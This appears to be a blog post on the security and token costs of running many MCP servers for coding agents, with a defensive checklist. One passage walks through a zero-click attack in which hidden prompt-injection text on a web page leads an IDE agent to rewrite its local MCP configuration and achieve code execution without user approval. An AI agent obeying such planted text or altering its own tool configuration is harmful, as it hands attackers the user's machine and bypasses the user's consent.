Trim Your MCP Server List Before It Trims Your Agent

Running too many MCP servers has two compounding costs most teams miss: a token overhead of 4-32x and an unpatched RCE flaw in the STDIO transport. Here is what to cut and why.

Cover art for Trim Your MCP Server List Before It Trims Your Agent

Connect GitHub, Slack, and Sentry to your coding agent and - before you type a single prompt - roughly 55,000 tokens of tool-schema definitions have already loaded into the context window. That is more than a quarter of Claude's 200k limit, gone before the work starts.

This is the MCP context tax, and teams are only now auditing it. But token overhead is not the only reason to shrink your server list. In April 2026, OX Security disclosed something harder to fix: a systemic RCE flaw baked into the STDIO transport of Anthropic's official MCP SDK - and Anthropic declined to patch it at the protocol level.

Running fewer, more deliberately chosen MCP servers is not a performance tweak. After April, it is a security posture.

Why MCP server security got complicated fast

OX Security's April 2026 disclosure documents a systemic remote code execution vulnerability in Anthropic's MCP SDK that stems not from a coding error but from a deliberate architectural design choice. The flaw is present across all officially supported language SDKs - Python, TypeScript, Java, and Rust - and allows any process command passed to the MCP STDIO interface to execute on the host system.

Anthropic confirmed the behavior as intentional and declined to modify the protocol architecture. The affected supply chain spans an estimated 150 million downloads, more than 7,000 publicly accessible servers, and up to 200,000 vulnerable instances.

The exploitation paths are not theoretical. In the LangFlow case alone, over 915 publicly accessible instances were online with the MCP configuration panel exposed without authentication. An attacker could send a crafted network request and achieve full RCE without ever logging in.

The most unsettling variant is the zero-click case. CVE-2026-30615 involves visiting an attacker-controlled web page, which causes Windsurf's AI agent to read hidden prompt injection instructions, silently edit the user's local MCP configuration file, and trigger RCE on the next agent invocation - with no user approval required. Windsurf was the only tested IDE where the entire sequence completed without any user interaction.

OX tested 11 MCP registries by submitting a proof-of-concept malicious package. Nine of eleven accepted it. That number explains why "just install trusted servers" is not straightforward advice when registry curation is this thin.

Downstream maintainers have been patching independently. Products with assigned CVEs include LiteLLM (CVE-2026-30623), Agent Zero (CVE-2026-30624), Bisheng (CVE-2026-33224), GPT Researcher (CVE-2025-65720), Jaaz (CVE-2026-30616), and LangBot, among others. The pattern is that each team is rediscovering the same allowlist fix in isolation, because Anthropic has declined to modify the protocol's architecture, citing the behavior as "expected," and while some vendors have issued patches, the shortcoming remains unaddressed in Anthropic's MCP reference implementation, causing developers to inherit the code execution risks.

SSE and HTTP transports communicate over network sockets rather than spawning OS subprocesses - they do not use StdioServerParameters and are not affected by the command-injection flaw. Migrating from STDIO to SSE or HTTP eliminates that attack surface entirely, at the cost of added deployment complexity.

The token overhead problem is separate and just as real

Even if the security picture were clean, the economics of a large MCP server list do not work. A benchmark by Scalekit ran 75 head-to-head comparisons - same model (Claude Sonnet 4), same tasks, same prompts - and found MCP costing 4 to 32 times more tokens than CLI for identical operations. Their simplest task, checking a repo's language, consumed 1,365 tokens via CLI and 44,026 via MCP. The overhead is almost entirely schema: 43 tool definitions injected into every conversation, of which the agent uses one or two.

The money translation is direct. Scalekit's replication put the monthly gap at $3.20 via CLI versus $55.20 via MCP at 10,000 operations on Sonnet 4. At team scale, that compounds fast. At a 200-engineer team paying the typical rate, the context tax alone is roughly $220 per working day, or about $55,000 per year, before any productive work tokens.

There is also a reliability dimension that rarely comes up in the cost discussion. Of 25 MCP runs in Scalekit's benchmark, 7 failed with ConnectTimeout. CLI ran 25 of 25 successfully. Every failure was a TCP-level timeout - the connection to GitHub's MCP server never completed. CLI agents do not have this problem because the executable runs locally.

What to actually do with your server list this week

The honest version of the MCP ecosystem in production: roughly 200 servers exist, half of them are toys, and the production-grade stack you actually run for daily work is smaller and more boring than the demo videos suggest.

One agency that tracked its production MCP stack for a year settled on eight daily-use servers - Filesystem, Puppeteer, Postgres, Brave, GitHub, Sentry, Notion, and one more - and found that trying fifteen for a month made Claude slower and less accurate due to context window pressure.

A security researcher's corollary: BlueRock Security found 36.7% of public MCP servers carry SSRF vulnerabilities, 41% have no authentication at all, and only 8.5% use OAuth. The "install and forget" posture that most teams have adopted was always wrong; now there is concrete data on what the exposure looks like.

The practical checklist is short. Check each server's transport: if it runs over STDIO and you cannot move it to HTTP, treat it as elevated risk and consider whether you need it at all. Prefer verified, vendor-maintained servers - GitHub, Microsoft Playwright, Figma, Supabase, Stripe, Cloudflare, Linear, Notion, Sentry are backed by the company whose name is on the box. Lowest risk, but still scope your tokens. For anything else, audit before install and pin to a known-good version.

On the token side, allow-listing pays off immediately. Allow-listing cuts the GitHub MCP context tax by roughly 80% of its schema overhead, with no code changes. Most MCP clients let you whitelist which tools the server exposes. If you load 5 of 50 tool definitions, you pay roughly one tenth of the original token cost on every turn.

A teammate like Beagle - which operates inside Slack rather than wiring into your filesystem - sidesteps the STDIO exposure entirely, since its integrations run over authenticated HTTP rather than local subprocesses.

The broader point is that MCP selection was always a judgment call. It just used to be judged only on features. The OX disclosure adds a second dimension to every server on your list: not just "does it do what I need?" but "what does it have permission to execute on my host?"

The MCP ecosystem is, in NimbleBrain's 2026 analysis, where web security was in 2005: functional but immature. The gap between adoption pace and security maturity has been visible for months; April made it measurable. A shorter, audited server list is not a concession to caution. It is how you run a production agent stack with a defensible surface area.

Keep reading